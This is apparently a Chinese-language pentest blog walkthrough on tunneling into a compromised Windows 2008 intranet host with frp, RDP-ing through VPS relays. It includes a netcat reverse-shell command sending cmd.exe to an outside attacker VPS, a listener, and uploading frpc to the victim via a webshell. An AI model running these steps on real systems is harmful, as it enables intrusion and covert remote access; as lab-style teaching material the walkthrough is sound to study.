Frp 內網穿透

 Frp  內網穿透

作者 : Noth 

前言 : 

滲透中很多內網穿透的方式,像 reGeorg、ngrok 等等之類的工具來進行內網穿透, 這次要介紹的是利用 frp 來進行 ! 

實作環境 : 

攻擊者 : 212.32.230.27 (VPS1,外網)
攻擊者 : 192.168.137.129 (windows 10,內網)
攻擊者 :  51.79.158.250 (VPS2,外網)
受害者 : 192.168.137.128 (windows 2008,內網)

內文 :

在 VPS1 下載 frp 服務端 : 

wget https://github.com/fatedier/frp/releases/download/v0.37.0/frp_0.37.0_linux_arm64.tar.gz

解壓縮 : 

tar zxvf frp_0.37.0_linux_amd64.tar.gz

進入到 frp_0.37.0_linux_amd64 目錄,修改 frps.ini :


修改為 1234,等等拿來監聽 : 

開啟 frps 服務端 :

./frps -c frps.ini

Windows 10 根據版本下載 frp 客戶端 : 


透過蟻劍將 frpc.exe、frpc.ini 上傳到受害者 C:/Windows/Temp 目錄 : 

修改 frpc.ini 配置 : 


將受害者反彈 shell 到 VPS2,開始監聽 : 

nc64.exe -lvvp 1056

受害者進行反彈 : 

nc64.exe 51.79.158.250 1056 -e cmd.exe 


成功反彈 shell : 


VPS2 執行 frpc :

frpc.exe -c frpc.ini


成功建立一個 tunnel : 

服務端(VPS1)

客戶端(受害者)

Windows 10 進行 RDP 連接 : 

mstsc ->  212.32.230.27:3389

成功連接 : 


筆者始終認為使用工具是必須的,但思路要清晰 xD  不可以只拘泥於一種方式,而是腦袋要靈活應用,每個滲透場景都截然不同 ! 滲透越打越深就會發現越來越吃基本功(系統、網路、程式),只能說遇到不懂就會發現自己所缺乏的知識點,再回去補足就好 !  真希望未來某一天能和一群大佬一起工作啊 !! ~  


留言

熱門文章